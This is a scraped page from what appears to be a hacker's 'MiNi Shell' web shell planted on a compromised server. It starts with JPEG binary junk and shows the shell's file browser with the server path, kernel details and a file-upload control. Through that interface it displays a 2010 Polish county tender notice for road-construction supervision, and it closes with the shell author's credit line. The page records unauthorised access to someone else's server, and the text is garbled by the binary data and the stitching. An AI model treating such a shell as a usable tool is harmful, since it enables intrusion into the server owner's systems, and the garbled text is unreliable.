JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/17985-N-2010.html

<p class="kh_header"><b>Ząbkowice Śląskie: Nadzór inwestorski nad  robotami budowlanymi zadania pn. Poprawa  dostępności komunikacyjnej Opactwa Cysterskiego w 
   Henrykowie -  przebudowa dróg nr 3174D i 3183D (Ząbkowice Śl. - Henryków).</b><br>
<b>Numer ogłoszenia: 17985 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ząbkowicki , ul. Sienkiewicza 11, 57-200 Ząbkowice Śląskie, woj. dolnośląskie, tel. 074 8162800, faks 074 8162850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zabkowicki.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad  robotami budowlanymi zadania pn. Poprawa  dostępności komunikacyjnej Opactwa Cysterskiego w 
   Henrykowie -  przebudowa dróg nr 3174D i 3183D (Ząbkowice Śl. - Henryków)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa nadzoru inwestorskiego w specjalności budowlanej drogowej nad 
    robotami budowlanymi zadania pn. Poprawa  dostępności komunikacyjnej Opactwa Cysterskiego w 
   Henrykowie -  przebudowa dróg nr 3174D i 3183D (Ząbkowice Śl. - Henryków). 
       Etap I - odcinek drogi powiatowej nr 3174D od drogi wojewódzkiej nr 395 w m. Henryków km  0+000 
       do skrzyżowania z drogą powiatową nr 3174D w m. Krzelków km 3+845 oraz odcinek drogi nr 3174D od 
       skrzyżowania z drogą nr 3183D w m. Krzelków km 14+312 do km 9+103  w m.Sieroszów - długość
       9.054 km.
       Etap II - odcinek drogi powiatowej nr 3174D  w m. Sieroszów  km 9+103 do skrzyżowania z  drogą
       wojewódzką  nr 385 km 0+000 w miejscowości Ząbkowice Śl. - długość  9.103 km.
2. Szczegółowo  przedmiot zamówienia określa projekt zagospodarowania terenu (etap I + II),  projekty 
    budowlany branża drogowa, energetyczna, telekomunikacyjna (etap I + II), pomocniczo przedmiar  robót 
    (dla etap I i II), specyfikacje  techniczne wykonania i odbioru robót budowlanych, będące załącznikami 
    do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 1.500 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w 
    art. 22 ust.1 ustawy Prawo zamówień publicznych, dotyczące:
   1) Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa 
       nakładają obowiązek ich posiadania,    2) Posiadania wiedzy i doświadczenia; .      - wykonali, co najmniej  2 usługi nadzoru inwestorskiego nad budową, przebudową dróg, co najmniej  
          kategorii Z o długości min. 4 km, o podobnym charakterze i złożoności oraz wartości nie mniejszej 
          niż 4.000.000 PLN.
          Dopuszcza się spełnienie tego wymagania w zakresie długości i wartości w ramach jednego 
          zadania lub dwóch zadań łącznie. 
   3) Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania 
       zamówienia;
       - dysponują osobami posiadającymi  uprawnienia budowlane w specjalności drogowej bez ograniczeń, 
          legitymują się minimum 5 letnim doświadczeniem zawodowym w nadzorach inwestorskich i są 
          wpisani na listę członków właściwej izby samorządu zawodowego.
    4) Sytuacji ekonomicznej i finansowej, 
        - opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest
           ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z
           przedmiotem zamówienia - na kwotę nie mniejszą niż 80.000 PLN. na okres wykonania zamówienia. 
2. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą 
     wykluczeniu z udziału w postępowaniu. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą. 3. Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na 
    podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych. 4. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty  złożone 
    przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki: 
1. Wypełniony formularz ofertowy, 2. Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień 
     publicznych,
3. Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 i 2 
    Prawa zamówień publicznych,
4. Wypełniony i parafowany przez wykonawcę wzór umowy,
5. Dowód wniesienia wadium  
B. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia 
 z art. 24 ust 1 Prawa zamówień publicznych wykonawca składa następujące dokumenty: 1. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu 
    wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie 
    wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie 
    wynika to z przedstawionych dokumentów rejestrowych. 3. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca 
    nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, 
    odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
    właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego
    Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na
    ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, 
    odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
    właściwego organu -wystawionego nie wcześniej niż 3 miesiące przed upływem  terminu składania ofert.
5. Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego 
    organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 
    ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, 
    wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
C. W celu wykazania spełnienia przez wykonawcę warunków, o których mowa w art. 22 ust.1 ustawy Pzp, należy złożyć następujące dokumenty:
1. Wykaz wykonanych w zakresie niezbędnym do wykazania spełnienia warunku  wiedzy i doświadczenia, 
    wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres 
    prowadzenia działalności jest krótszy - w tym okresie,  z podaniem ich rodzaju i  wartości, daty i miejsca 
    wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały  wykonane zgodnie z 
    zasadami sztuki budowlanej i prawidłowo ukończone tj.
     - wykonali, co najmniej 2 usługi nadzoru inwestorskiego nad  budowa, przebudową dróg, co najmniej  
         kategorii Z o długości min. 4 km, o podobnym charakterze i złożoności oraz wartości nie mniejszej 
         niż 4.000.000 PLN (w  ramach jednego zadania lub dwóch zadań łącznie ), 
 2. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych 
     za nadzór nad robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,
     doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, oraz informacji o podstawie do
     dysponowania tymi osobami,
     Do niniejszego wykazu należy załączyć dokumenty potwierdzające, posiadane uprawnienia 
     budowlane,  oraz zaświadczenie o przynależności do właściwej izby samorządu zawodowego.
 3. Opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest 
     ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z
     przedmiotem zamówienia - na kwotę nie mniejszą niż 80.000 PLN. na okres wykonania  zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zabkowicki.powiat.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Ząbkowicki
ul. Sienkiewicza 11 ,
57-200 Ząbkowice Śląskie pok.110.Koszt specyfikacji w wersji papierowej 1000zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2010 godzina 09:00, miejsce: Powiat Ząbkowicki
ul. Sienkiewicza 11 ,
57-200 Ząbkowice Śląskie
Sekretariat pok.202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego

Creat By MiNi SheLL
Email: jattceo@gmail.com